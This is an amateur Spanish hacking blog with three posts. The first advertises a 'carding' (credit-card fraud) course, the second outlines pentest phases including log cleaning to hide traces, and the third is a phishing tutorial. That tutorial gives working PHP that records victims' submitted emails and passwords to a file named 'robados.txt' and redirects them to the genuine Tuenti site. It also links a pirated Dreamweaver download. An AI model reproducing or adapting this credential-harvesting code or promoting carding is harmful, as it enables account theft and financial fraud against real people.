Mostrando entradas con la etiqueta Manuales. Mostrar todas las entradas
Mostrando entradas con la etiqueta Manuales. Mostrar todas las entradas

10 de enero de 2012

Stand by

Bueno mis lectores como ando en vacaciones no he podio hacer publicaciones pero les quiero avisar que voy a iniciar un curso de carding para los que se quieran inscribir lo voy a iniciar en febrero si alguien se quiere inscribir me puede escribir al correo thefidentis@yahoo.es
O publican un comentario en esta entrada.

[caption id="" align="alignnone" width="470" caption="fidentis"]image[/caption]

27 de abril de 2011

Pentester y Pentesting

Averiguando un poco sobre lo que me interesa encontre esta info muy valiosa, espero les sea de ayuda como lo fue para mi:











Que es un Pentester?

Un Pentester es un experto en seguridad de sistemas con el instinto y conocimientos de un Hacker, qué utiliza sus amplios conocimientos  en el manejo de sistemas operativos, aplicaciones y vulnerabilidades, con conocimientos en programación para la creación de herramientas y códigos, procesamientos sistemáticos de pruebas, creación de documentaciones, escritura de reportes y presentar resultados de sus investigaciones a técnicos y áreas de administración.











En que consiste un Pentesting













Preparación
Objetivo del pentest, clasificación del test (interno/externo, black-/white-box, agresividad, objetivos), contactos, accesos a la infraestructura y herramientas, duración del test, legalidades (contratos, privacia,etc), área de trabajo
Proceso
1 Foot printing (DNS, Who is, ISP)
2 Port scanning (TCP and UDP)
3 Finger printing (Operating System, ICMP, Services, Applications)
4 Vulnerability Research (Internet, CVE)
5 Exploiting (Exploits, Trophy)
6 Hide Traces (Log cleaning)
7 Documentation (Report, Presentation)
Reporte
Pagina principal, introducción (2 paginas: objetivos, metodos y herramientas), resultados, agregados, recomendaciones, anexos con datos de test técnicos, retroalimentación
FUENTE

25 de abril de 2010

Como hacer un scam

Weno aky os dejo a los q empezais en el hack o en el phising, un tutorial muy bueno para acer vuestros propios scams, recordar q algunas web

tienen proteccion contra phising y no os saldra bien el scam.

[googlevideo=http://video.google.es/videoplay?docid=8735564469493328179&hl=es]

Codigo php para q no tengais q copiarlo desde el tutorial:
Código:


<?php
$id=$_POST['entrar'];
$pass=$_POST['cont'];
$master=fopen('robados.txt',a);
fwrite($master,"
email: ".$id." ...... pass: " .$pass." ");
fclose($master);
echo "<meta http-equiv='Refresh' content='1;url=http://www.tuenti.com/'>";
?>


 

Esta ultima linea: echo "<meta http-equiv='Refresh' content='1;url=http://www.tuenti.com/'>";

es para q cuando entre se recargue a la pagina original asi q donde pone www.tuenti.com, poned la pagina q aveis echo el scam

Herramientas usadas en el Video-Tutorial: 

http://rapidshare.com/files/134633720/Dreamweaver_8.rar